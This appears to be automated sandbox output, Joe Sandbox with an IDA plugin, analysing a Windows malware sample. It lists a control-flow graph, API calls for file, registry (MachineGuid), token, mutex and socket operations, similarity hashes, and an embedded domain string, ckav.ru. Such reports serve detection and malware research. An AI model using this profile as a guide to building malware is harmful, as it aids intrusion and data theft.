                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 556 4040bb-4040f2 call 4031e5 CreateFileW 559 4040f8-404111 call 4031e5 556->559 560 40418d-404190 556->560 571 404113-404119 559->571 572 40417a 559->572 562 404192-4041a7 call 403c90 560->562 563 404184 560->563 562->563 568 4041a9-4041b8 call 403c59 562->568 565 404186-40418c 563->565 576 4041ba-4041d8 call 4040bb call 403d44 568->576 577 4041db-4041e4 call 402bab 568->577 571->572 575 40411b-404120 571->575 574 40417d-40417e call 403c40 572->574 583 404183 574->583 579 404122 575->579 580 404124-404140 call 4031e5 VirtualAlloc 575->580 576->577 577->565 579->580 580->572 589 404142-40415e call 4031e5 ReadFile 580->589 583->563 589->574 593 404160-404178 call 4031e5 589->593 593->574
                                                                            APIs
                                                                            • CreateFileW.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000080,00000000,00000000,E9FABB88,00000000,00000000,00000000,00000001,00000000), ref: 004040E8
                                                                            • VirtualAlloc.KERNELBASE(00000000,00000000,00001000,00000004,00000000,D4EAD4E2,00000000,00000000), ref: 0040413A
                                                                            • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000,00000000,CD0C9940,00000000,00000000), ref: 0040415A
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3130771198.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: File$AllocCreateReadVirtual
                                                                            • String ID: .tmp
                                                                            • API String ID: 3585551309-2986845003
                                                                            • Opcode ID: 9631e6f5e9699617cd127c849230d2104622380ed218987cebf5414177a879fc
                                                                            • Instruction ID: b436c3373f33a6751ef3154d9799880e4ac32c23f8ae8b62b11f674aa4b57f97
                                                                            • Opcode Fuzzy Hash: 9631e6f5e9699617cd127c849230d2104622380ed218987cebf5414177a879fc
                                                                            • Instruction Fuzzy Hash: 2C31F87150112477D721AE664C49FDF7E6CDFD67A4F10003AFA08BA2C1DA799B41C2E9
                                                                            APIs
                                                                            • SetErrorMode.KERNELBASE(00000003,00000000,D1E96FCD,00000000,00000000,00000000,00000000), ref: 00413885
                                                                            • CreateMutexW.KERNELBASE(00000000,00000001,00000000,00000000,CF167DF4,00000000,00000000), ref: 0041399C
                                                                            • GetLastError.KERNEL32 ref: 0041399E
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3130771198.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Error$CreateLastModeMutex
                                                                            • String ID:
                                                                            • API String ID: 3448925889-0
                                                                            • Opcode ID: 5dd40e4cfd1fe52203b1fe5968f304513c4092ad3980e50a04d496178e49115f
                                                                            • Instruction ID: 7738172b6d33d5602fc402945caed90a0cea100ae195543e4e9fee3f6653e559
                                                                            • Opcode Fuzzy Hash: 5dd40e4cfd1fe52203b1fe5968f304513c4092ad3980e50a04d496178e49115f
                                                                            • Instruction Fuzzy Hash: 11415E61964348A8EB10ABF1AC82EFFA738EF54755F10641FF504F7291E6794A80836E
                                                                            APIs
                                                                            • CreateFileW.KERNELBASE(00000000,C0000000,00000000,00000000,00000004,00000080,00000000,00000000,E9FABB88,00000000,00000000,00000000,00000001,?,?,004146E2), ref: 004042F9
                                                                            • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000002,00000000,EEBAAE5B,00000000,00000000,?,?,004146E2,00000000,00000000,?,00000000,00000000), ref: 00404314
                                                                            • WriteFile.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,C148F916,00000000,00000000,?,?,004146E2,00000000,00000000,?,00000000), ref: 00404334
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3130771198.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: File$CreatePointerWrite
                                                                            • String ID:
                                                                            • API String ID: 3672724799-0
                                                                            • Opcode ID: b52d99f42f68723aef5fd834f3fc6c8fdb7b2d5b4e411be9fbae0770ffe78be6
                                                                            • Instruction ID: 60e70a0f6cedc7b52d1efda55ce7422740d02a59a4e71dca7f773cbcdc95941a
                                                                            • Opcode Fuzzy Hash: b52d99f42f68723aef5fd834f3fc6c8fdb7b2d5b4e411be9fbae0770ffe78be6
                                                                            • Instruction Fuzzy Hash: 2F014F315021343AD6356A679C0EEEF6D5DDF8B6B5F10422AFA18B60D0EA755B0181F8
                                                                            APIs
                                                                            • CreateThread.KERNELBASE(00000000,00000000,0041289A,00000000,00000000,?,00000000,FCAE4162,00000000,00000000,?,?,?,?,00000001,00000000), ref: 00412F53
                                                                              • Part of subcall function 0040632F: _wmemset.LIBCMT ref: 0040634F
                                                                              • Part of subcall function 00402BAB: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00402BB9
                                                                              • Part of subcall function 00402BAB: HeapFree.KERNEL32(00000000), ref: 00402BC0
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3130771198.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Heap$CreateFreeProcessThread_wmemset
                                                                            • String ID: ckav.ru
                                                                            • API String ID: 2915393847-2696028687
                                                                            • Opcode ID: eacd1f59d46a33f08cf175cca3b3b274a2abcb1d178fb3fa8030531899280e62
                                                                            • Instruction ID: 4531c2d42d5f5f74382d08a8027233dc497c0745a20cb628f46216a694decd77
                                                                            • Opcode Fuzzy Hash: eacd1f59d46a33f08cf175cca3b3b274a2abcb1d178fb3fa8030531899280e62
                                                                            • Instruction Fuzzy Hash: 7751B7728005047EEA113B62DD4ADEB3669EB2034CB54423BFC06B51B2E67A4D74DBED
                                                                            APIs
                                                                              • Part of subcall function 00402B7C: GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
                                                                              • Part of subcall function 00402B7C: RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C
                                                                            • _wmemset.LIBCMT ref: 0040634F
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3130771198.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Heap$AllocateProcess_wmemset
                                                                            • String ID: CA
                                                                            • API String ID: 2773065342-1052703068
                                                                            • Opcode ID: 4afda30c811b228529c54d72888b6e374887d4959eaca369bf1b72bc4a37c641
                                                                            • Instruction ID: fc433e2548431d42ded6bbe1dab57db4bffb986d933035261d01f02eae51e62b
                                                                            • Opcode Fuzzy Hash: 4afda30c811b228529c54d72888b6e374887d4959eaca369bf1b72bc4a37c641
                                                                            • Instruction Fuzzy Hash: 0FE09B62A4511477D121A9665C06EAF76AC8F41B64F11017FFC05B62C1E9BC9E1101FD
                                                                            APIs
                                                                            • GetTokenInformation.KERNELBASE(?,00000000,00000001,?,004062B4,00000009,ECAE3497,00000000,00000000,IDA,004062B4,IDA,00000001,00000000,?,?), ref: 004060A8
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3130771198.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: InformationToken
                                                                            • String ID: IDA
                                                                            • API String ID: 4114910276-365204570
                                                                            • Opcode ID: 947dba5d192e13df99ca19526492baac9a77df32751a8a878116f3f8cb9ab45e
                                                                            • Instruction ID: 313645685f6ff1854c13b9bf72d10cc52e042395484f5c11e0c3c7a214e99d66
                                                                            • Opcode Fuzzy Hash: 947dba5d192e13df99ca19526492baac9a77df32751a8a878116f3f8cb9ab45e
                                                                            • Instruction Fuzzy Hash: F4D0C93214020DBFEF025EC1DC02F993F2AAB08754F008410BB18280E1D6B39670AB95
                                                                            APIs
                                                                            • GetProcAddress.KERNELBASE(?,s1@,00000000,CEB18ABC,00000000,00000000,?,00403173,?,00000000), ref: 00402C1B
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3130771198.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: AddressProc
                                                                            • String ID: s1@
                                                                            • API String ID: 190572456-427247929
                                                                            • Opcode ID: 111d3fe3cf3de278b88478875a5240f52c9cc91b538b26207c7303d9e6a3f6a3
                                                                            • Instruction ID: 1fbf97b0b55819c82851c7ea3a697f1c0796d20c97a22cfecd58a5260392007e
                                                                            • Opcode Fuzzy Hash: 111d3fe3cf3de278b88478875a5240f52c9cc91b538b26207c7303d9e6a3f6a3
                                                                            • Instruction Fuzzy Hash: A5C048B10142087EAE016EE19C05CBB3F5EEA44228B008429BD18E9122EA3ADE2066A4
                                                                            APIs
                                                                              • Part of subcall function 00402B7C: GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
                                                                              • Part of subcall function 00402B7C: RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C
                                                                            • RegOpenKeyExA.KERNELBASE(00000032,?,00000000,00020119,00000000,00000009,F4B4ACDC,00000000,00000000,MachineGuid,00000032,00000000,00413DA5,00413987), ref: 00404A9A
                                                                            • RegQueryValueExA.KERNELBASE(?,00000000,00000000,00000000,00000000,00000009,00000009,FE9F661A,00000000,00000000), ref: 00404ABC
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3130771198.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Heap$AllocateOpenProcessQueryValue
                                                                            • String ID:
                                                                            • API String ID: 1425999871-0
                                                                            • Opcode ID: bcb9612233ffeb4634d4995e45ab0b963c80d9ccd10657b8c49858d8039cb957
                                                                            • Instruction ID: c751ae4fb1a51baa23b068920df28fa5e45e9ad9ad003da97b765f6d6e9ada80
                                                                            • Opcode Fuzzy Hash: bcb9612233ffeb4634d4995e45ab0b963c80d9ccd10657b8c49858d8039cb957
                                                                            • Instruction Fuzzy Hash: A301B1B264010C7EEB01AED69C86DBF7B2DDB81798B10003EF60475182EAB59E1156B9
                                                                            APIs
                                                                            • CheckTokenMembership.KERNELBASE(00000000,00000000,00000000,00000009,E3B938DF,00000000,00000000,00000001), ref: 00406115
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3130771198.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CheckMembershipToken
                                                                            • String ID:
                                                                            • API String ID: 1351025785-0
                                                                            • Opcode ID: 4a43c4ed47dff20a0e63da0344eb6b70d0e7b4795f78c2e23bdd5dfdab477f71
                                                                            • Instruction ID: 8b780b9e56efd5f2a9a2252a5f210822aeafba94d0ba5a8497d60ad8274f78a0
                                                                            • Opcode Fuzzy Hash: 4a43c4ed47dff20a0e63da0344eb6b70d0e7b4795f78c2e23bdd5dfdab477f71
                                                                            • Instruction Fuzzy Hash: 7801867195020DBEEB00EBE59C86EFFB77CEF08208F100569B515B60C2EA75AF008764
                                                                            APIs
                                                                            • CreateDirectoryW.KERNELBASE(00413D1F,00000000,00000000,C8F0A74D,00000000,00000000,00000000,?,00413D1F,00000000), ref: 00403C8B
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3130771198.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CreateDirectory
                                                                            • String ID:
                                                                            • API String ID: 4241100979-0
                                                                            • Opcode ID: d413ab25134c4b1c761ae7c40b175d3f6038492197e92d4c0305fa2d5b60993a
                                                                            • Instruction ID: 8def336d827aa123259dd30fe2d1f4df156212ecddfe904d71fbacf529eca846
                                                                            • Opcode Fuzzy Hash: d413ab25134c4b1c761ae7c40b175d3f6038492197e92d4c0305fa2d5b60993a
                                                                            • Instruction Fuzzy Hash: 47D05E320450687A9A202AA7AC08CDB3E0DDE032FA7004036B81CE4052DB26861191E4
                                                                            APIs
                                                                            • GetNativeSystemInfo.KERNELBASE(?,00000000,E9AF4586,00000000,00000000,?,?,?,?,004144CF,00000000,00000000,00000000,00000000), ref: 00406445
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3130771198.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: InfoNativeSystem
                                                                            • String ID:
                                                                            • API String ID: 1721193555-0
                                                                            • Opcode ID: 18b792e9f3ed795f2423495cf2abf5b642ecf28d7d26812d11fe043f37d9eb75
                                                                            • Instruction ID: 89a273ea7bbabd9d74fc824e7d15e3b55fbc967ee531cdb223f62f0d5b23fb21
                                                                            • Opcode Fuzzy Hash: 18b792e9f3ed795f2423495cf2abf5b642ecf28d7d26812d11fe043f37d9eb75
                                                                            • Instruction Fuzzy Hash: 60D0C9969142082A9B24FEB14E49CBB76EC9A48104B400AA8FC05E2180FD6ADF5482A5
                                                                            APIs
                                                                            • send.WS2_32(00000000,00000000,00000000,00000000), ref: 00404F07
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3130771198.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: send
                                                                            • String ID:
                                                                            • API String ID: 2809346765-0
                                                                            • Opcode ID: f5f37575630baef1eb429ccea87373dc8bd2737f5fb4b11d46726e1bb86e5636
                                                                            • Instruction ID: 973ad19c2726000f66dbac5dad6f1ecaf56acd36cc9bde1755ab86a88c27f217
                                                                            • Opcode Fuzzy Hash: f5f37575630baef1eb429ccea87373dc8bd2737f5fb4b11d46726e1bb86e5636
                                                                            • Instruction Fuzzy Hash: F8D09231140209BBEF016E55EC05BAA3B69EF44B54F10C026BA18991A1DB31A9219A98
                                                                            APIs
                                                                            • MoveFileExW.KERNELBASE(00000000,00412C16,?,00000000,C9143177,00000000,00000000,?,004040B6,00000000,00412C16,00000001,?,00412C16,00000000,00000000), ref: 00403BEB
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3130771198.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: FileMove
                                                                            • String ID:
                                                                            • API String ID: 3562171763-0
                                                                            • Opcode ID: 7a0bb135e6e1f0606704ed46507384a8cac74e7a8e8860f1f6d7d5715d4ca302
                                                                            • Instruction ID: 27267517ebbd606c040c475238707358b0366275ca1c9c11413b547716cf2561
                                                                            • Opcode Fuzzy Hash: 7a0bb135e6e1f0606704ed46507384a8cac74e7a8e8860f1f6d7d5715d4ca302
                                                                            • Instruction Fuzzy Hash: 5AC04C7500424C7FEF026EF19D05C7B3F5EEB49618F448825BD18D5421DA37DA216664
                                                                            APIs
                                                                            • WSAStartup.WS2_32(00000202,?), ref: 00404E08
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3130771198.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Startup
                                                                            • String ID:
                                                                            • API String ID: 724789610-0
                                                                            • Opcode ID: aec8cb7098972fa6752499418e154eb0e8b54166df737fc870e0652f0f0fb75e
                                                                            • Instruction ID: edfb6e6a7b2c2d2c81179f298452045bbfcf768a57aceb16f5d93ae35c4528ea
                                                                            • Opcode Fuzzy Hash: aec8cb7098972fa6752499418e154eb0e8b54166df737fc870e0652f0f0fb75e
                                                                            • Instruction Fuzzy Hash: 6EC08C32AA421C9FD750AAB8AD0FAF0B7ACD30AB02F0002B56E1DC60C1E550582906E2
                                                                            APIs
                                                                            • SetFileAttributesW.KERNELBASE(00000000,00002006,00000000,CAC5886E,00000000,00000000,?,00412C3B,00000000,00000000,?), ref: 00404297
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3130771198.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: AttributesFile
                                                                            • String ID:
                                                                            • API String ID: 3188754299-0
                                                                            • Opcode ID: 8dd52a8075b7bef316d0fc581140073ef821e073e46509cdb91d5efed9f2b539
                                                                            • Instruction ID: e837d3b0865cda380a04769d40cc561620ee701a25bf2a33446201ee5459e2a9
                                                                            • Opcode Fuzzy Hash: 8dd52a8075b7bef316d0fc581140073ef821e073e46509cdb91d5efed9f2b539
                                                                            • Instruction Fuzzy Hash: A9C092B054430C3EFA102EF29D4AD3B3A8EEB41648B008435BE08E9096E977DE2061A8
                                                                            APIs
                                                                            • RegOpenKeyW.ADVAPI32(?,?,?,00000009,DB552DA5,00000000,00000000), ref: 00404A35
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3130771198.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Open
                                                                            • String ID:
                                                                            • API String ID: 71445658-0
                                                                            • Opcode ID: 878e79dc60d56a32ccce77cf818dc40cd176942d244c38d6301a2c771aeba921
                                                                            • Instruction ID: b1d3f25f69c2166d3d07fcddbc0993e3b6974a4a806b5379996ceb22213e89af
                                                                            • Opcode Fuzzy Hash: 878e79dc60d56a32ccce77cf818dc40cd176942d244c38d6301a2c771aeba921
                                                                            • Instruction Fuzzy Hash: 5BC012311802087FFF012EC1CC02F483E1AAB08B55F044011BA18280E1EAB3A2205658
                                                                            APIs
                                                                            • DeleteFileW.KERNELBASE(?,00000000,DEAA357B,00000000,00000000), ref: 00403C1D
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3130771198.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: DeleteFile
                                                                            • String ID:
                                                                            • API String ID: 4033686569-0
                                                                            • Opcode ID: 01b23650ea3b3ad0b7ef3e64b7b20365c040140a899dd4cba48e3dfa7394e9f1
                                                                            • Instruction ID: 5639c68ad781144a2d68ff400f656d3d2c658e81fc8059c2e96e04b5885f7932
                                                                            • Opcode Fuzzy Hash: 01b23650ea3b3ad0b7ef3e64b7b20365c040140a899dd4cba48e3dfa7394e9f1
                                                                            • Instruction Fuzzy Hash: EDB092B04082093EAA013EF59C05C3B3E4DDA4010870048257D08E6111EA36DF1010A8
                                                                            APIs
                                                                            • LoadLibraryW.KERNELBASE(?,00000000,E811E8D4,00000000,00000000), ref: 00402C34
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3130771198.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: LibraryLoad
                                                                            • String ID:
                                                                            • API String ID: 1029625771-0
                                                                            • Opcode ID: af34b662912c89fdb3a0f1b9ff73cd040c3e05ef601eeab43baa4f39a88cbda5
                                                                            • Instruction ID: cd53f9395925d29cf68d66af6aae64644fca58afce9bbcd5edfe8b9605b00cd0
                                                                            • Opcode Fuzzy Hash: af34b662912c89fdb3a0f1b9ff73cd040c3e05ef601eeab43baa4f39a88cbda5
                                                                            • Instruction Fuzzy Hash: C9B092B00082083EAA002EF59C05C7F3A4DDA4410874044397C08E5411F937DE1012A5
                                                                            APIs
                                                                            • FindClose.KERNELBASE(00403F8D,00000000,DA6AE59A,00000000,00000000,?,00403F8D,00000000), ref: 00403C04
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3130771198.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CloseFind
                                                                            • String ID:
                                                                            • API String ID: 1863332320-0
                                                                            • Opcode ID: 9873c53fda05388afb850746851f5e32e8254642b63e91831ef49aacf0f87411
                                                                            • Instruction ID: 1ebc74916e7009c76bd4f38d62a0f1d2d6d24e136e2668fcc01a71b48f24aa02
                                                                            • Opcode Fuzzy Hash: 9873c53fda05388afb850746851f5e32e8254642b63e91831ef49aacf0f87411
                                                                            • Instruction Fuzzy Hash: FDB092B00442087EEE002EF1AC05C7B3F4EDA4410970044257E0CE5012E937DF1010B4
                                                                            APIs
                                                                            • GetFileAttributesW.KERNELBASE(00413D1F,00000000,C6808176,00000000,00000000,?,00403D58,00413D1F,?,00403C6D,00413D1F,?,00413D1F,00000000), ref: 00403BCC
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3130771198.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: AttributesFile
                                                                            • String ID:
                                                                            • API String ID: 3188754299-0
                                                                            • Opcode ID: 1d6dd25f7c332fd1d35fbf5985813ee51de81cf8f6e5d0f963c2f0c9ec148b39
                                                                            • Instruction ID: 12c622a32f4ce0ce5baf48af10e49973588d22e73ecb696d4958cc4f11b8a016
                                                                            • Opcode Fuzzy Hash: 1d6dd25f7c332fd1d35fbf5985813ee51de81cf8f6e5d0f963c2f0c9ec148b39
                                                                            • Instruction Fuzzy Hash: D2B092B05042083EAE012EF19C05C7B3A6DCA40148B4088297C18E5111ED36DE5050A4
                                                                            APIs
                                                                            • RegCloseKey.KERNELBASE(00000000,00000009,D980E875,00000000,00000000,?,00404A44,?,?,00404AC6,?), ref: 00404A15
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3130771198.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Close
                                                                            • String ID:
                                                                            • API String ID: 3535843008-0
                                                                            • Opcode ID: a61027cf4d9072e61279d4b4f16a9571f3d05446971c54f2b184413104fd85b7
                                                                            • Instruction ID: 75bcc15c4d71fff8019d16f1d9debb39272117f3de5fdcc107556e34aff8dcac
                                                                            • Opcode Fuzzy Hash: a61027cf4d9072e61279d4b4f16a9571f3d05446971c54f2b184413104fd85b7
                                                                            • Instruction Fuzzy Hash: 7CC092312843087AEA102AE2EC0BF093E0D9B41F98F500025B61C3C1D2E9E3E6100099
                                                                            APIs
                                                                            • PathFileExistsW.KERNELBASE(?,00000002,DC0853E1,00000000,00000000), ref: 00403B7A
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3130771198.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: ExistsFilePath
                                                                            • String ID:
                                                                            • API String ID: 1174141254-0
                                                                            • Opcode ID: 79b415000e3dec3248a6d2155c6771fe406342b29d1d2faf8e1af97ba013cdd8
                                                                            • Instruction ID: 8bd75bc93bbce64143a6918826fd0663652f5dbe7ab318808702af7ec0dd126f
                                                                            • Opcode Fuzzy Hash: 79b415000e3dec3248a6d2155c6771fe406342b29d1d2faf8e1af97ba013cdd8
                                                                            • Instruction Fuzzy Hash: F4C0923028830C3BF9113AD2DC47F197E8D8B41B99F104025B70C3C4D2D9E3A6100199
                                                                            APIs
                                                                            • closesocket.WS2_32(00404EB0), ref: 00404DEB
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3130771198.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: closesocket
                                                                            • String ID:
                                                                            • API String ID: 2781271927-0
                                                                            • Opcode ID: 887654383893d56b64fc04469bc98b787ac4c367861e76a9ad562a01a17cc3aa
                                                                            • Instruction ID: a7719220e23c04317d26723f710bfa070304820e6d91f105ed764937a1a9d613
                                                                            • Opcode Fuzzy Hash: 887654383893d56b64fc04469bc98b787ac4c367861e76a9ad562a01a17cc3aa
                                                                            • Instruction Fuzzy Hash: F4A0113000020CEBCB002B82EE088C83F2CEA882A0B808020F80C00020CB22A8208AC8
                                                                            APIs
                                                                            • VirtualFree.KERNELBASE(0041028C,00000000,00008000,00000000,F53ECACB,00000000,00000000,00000000,?,0041028C,00000000), ref: 00403FBA
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3130771198.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: FreeVirtual
                                                                            • String ID:
                                                                            • API String ID: 1263568516-0
                                                                            • Opcode ID: 4437192c676a59da206b473fb72d9d26ef1781d862ceba0a26f5730449a5d479
                                                                            • Instruction ID: 31a36aa897feec3f2575a3818ba469950b8b51fe97d839facc05156de448dee4
                                                                            • Opcode Fuzzy Hash: 4437192c676a59da206b473fb72d9d26ef1781d862ceba0a26f5730449a5d479
                                                                            • Instruction Fuzzy Hash: 9CC08C3200613C32893069DBAC0AFCB7E0CDF036F4B104021F50C6404049235A0186F8
                                                                            APIs
                                                                            • CloseHandle.KERNELBASE(00000000,00000000,FBCE7A42,00000000,00000000,?,00404344,00000000,?,?,004146E2,00000000,00000000,?,00000000,00000000), ref: 00403C55
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3130771198.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CloseHandle
                                                                            • String ID:
                                                                            • API String ID: 2962429428-0
                                                                            • Opcode ID: 67fd61e36e72385b159b193fd7e1560e83aa445b7d913ea69a34d34039b65f78
                                                                            • Instruction ID: f60e35b61e15034c3e7e350ceef27d37971f1a6745175d5827dd76012fe363c0
                                                                            • Opcode Fuzzy Hash: 67fd61e36e72385b159b193fd7e1560e83aa445b7d913ea69a34d34039b65f78
                                                                            • Instruction Fuzzy Hash: 70B092B01182087EAE006AF29C05C3B3E4ECA4060874094267C08E5451F937DF2014B4
                                                                            APIs
                                                                            • Sleep.KERNELBASE(?,00000000,CFA329AD,00000000,00000000), ref: 00406487
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3130771198.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Sleep
                                                                            • String ID:
                                                                            • API String ID: 3472027048-0
